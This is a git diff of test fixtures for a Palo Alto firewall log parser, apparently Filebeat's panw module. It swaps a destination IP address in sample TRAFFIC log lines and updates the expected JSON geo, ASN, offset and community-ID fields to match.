 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:48,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,end,1,2012/04/10 04:39:47,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25310,1,60026,53,0,0,0x200000,udp,allow,166,166,0,2,2012/04/10 04:39:16,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json
index 2a330cd36949..f8a6b70213fb 100644
--- a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json
+++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json
@@ -6,19 +6,15 @@
         "client.packets": 1,
         "client.port": 59324,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -31,7 +27,7 @@
         "event.end": "2012-04-10T04:39:59.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:59.000-02:00",
         "event.timezone": "-02:00",
@@ -46,7 +42,7 @@
         "log.offset": 0,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:MaqerLAYuvMg6JWjWKmIMO6QJ6s=",
+        "network.community_id": "1:OS2Ubhid3OLGrPLNmOkR1m08mU0=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -78,14 +74,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -109,14 +105,7 @@
         "client.port": 54448,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -142,7 +131,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 364,
+        "log.offset": 362,
         "network.application": "dns",
         "network.bytes": 76,
         "network.community_id": "1:rmRctS0ZS56Ixay3V5beNERhPNc=",
@@ -208,14 +197,7 @@
         "client.port": 53121,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -241,7 +223,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 717,
+        "log.offset": 715,
         "network.application": "dns",
         "network.bytes": 76,
         "network.community_id": "1:NmeRH4O3xNBaUjzIOpdGXeAJ/sg=",
@@ -306,19 +288,15 @@
         "client.packets": 1,
         "client.port": 59323,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -331,7 +309,7 @@
         "event.end": "2012-04-10T04:39:58.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:58.000-02:00",
         "event.timezone": "-02:00",
@@ -343,10 +321,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 1070,
+        "log.offset": 1068,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:ej/0QPUwuraByxuNxWsOp2ouPuE=",
+        "network.community_id": "1:r5Rh3xb027aSYQ6qFvtpERnQwLs=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -378,14 +356,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -408,19 +386,15 @@
         "client.packets": 1,
         "client.port": 59322,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -433,7 +407,7 @@
         "event.end": "2012-04-10T04:39:58.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:58.000-02:00",
         "event.timezone": "-02:00",
@@ -445,10 +419,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 1434,
+        "log.offset": 1430,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:XHKuVPA6enGOr0Qng8AJtYTgWAQ=",
+        "network.community_id": "1:mEVZ19gViqVgBuPhb2ArUOJD3vw=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -480,14 +454,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -511,14 +485,7 @@
         "client.port": 55766,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -544,7 +511,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 1798,
+        "log.offset": 1792,
         "network.application": "dns",
         "network.bytes": 74,
         "network.community_id": "1:bkpOCSg/r3P7zn1eVdfrSSHQMn0=",
@@ -610,14 +577,7 @@
         "client.port": 55072,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -643,7 +603,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 2151,
+        "log.offset": 2145,
         "network.application": "dns",
         "network.bytes": 74,
         "network.community_id": "1:f08UBDqcNW5jC3R+i40XfD1g8l8=",
@@ -708,19 +668,15 @@
         "client.packets": 6,
         "client.port": 59207,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 806,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 4,
         "destination.port": 80,
         "event.action": "flow_terminated",
@@ -733,7 +689,7 @@
         "event.end": "2012-04-10T04:39:28.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:27.000-02:00",
         "event.timezone": "-02:00",
@@ -745,10 +701,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 2504,
+        "log.offset": 2498,
         "network.application": "web-browsing",
         "network.bytes": 1355,
-        "network.community_id": "1:kGyE7FdnFLrk4Cc6NHaD5WeE81A=",
+        "network.community_id": "1:zWPCOPDweVvFNBQjBcevkW/4xkk=",
         "network.direction": "outbound",
         "network.packets": 10,
         "network.transport": "tcp",
@@ -780,14 +736,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 806,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 4,
         "server.port": 80,
         "service.type": "panw",
@@ -810,19 +766,15 @@
         "client.packets": 6,
         "client.port": 59209,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 806,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 4,
         "destination.port": 80,
         "event.action": "flow_terminated",
@@ -835,7 +787,7 @@
         "event.end": "2012-04-10T04:39:28.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:28.000-02:00",
         "event.timezone": "-02:00",
@@ -847,10 +799,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 2889,
+        "log.offset": 2881,
         "network.application": "web-browsing",
         "network.bytes": 1355,
-        "network.community_id": "1:pxN/AvFcFozLjRgniFdZmScORYQ=",
+        "network.community_id": "1:M0wX7T9OlwBxAVwvoOBXz/ItDAU=",
         "network.direction": "outbound",
         "network.packets": 10,
         "network.transport": "tcp",
@@ -882,14 +834,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 806,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 4,
         "server.port": 80,
         "service.type": "panw",
@@ -912,19 +864,15 @@
         "client.packets": 6,
         "client.port": 59208,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 806,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 4,
         "destination.port": 80,
         "event.action": "flow_terminated",
@@ -937,7 +885,7 @@
         "event.end": "2012-04-10T04:39:28.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:27.000-02:00",
         "event.timezone": "-02:00",
@@ -949,10 +897,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 3274,
+        "log.offset": 3264,
         "network.application": "web-browsing",
         "network.bytes": 1355,
-        "network.community_id": "1:HmuQtYxq+NpgJ0zVEIpz7zLNOKM=",
+        "network.community_id": "1:4KyZ6yta5GEc2tteXzHowX+7VyU=",
         "network.direction": "outbound",
         "network.packets": 10,
         "network.transport": "tcp",
@@ -984,14 +932,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 806,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 4,
         "server.port": 80,
         "service.type": "panw",
@@ -1014,19 +962,15 @@
         "client.packets": 1,
         "client.port": 59318,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -1039,7 +983,7 @@
         "event.end": "2012-04-10T04:39:58.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
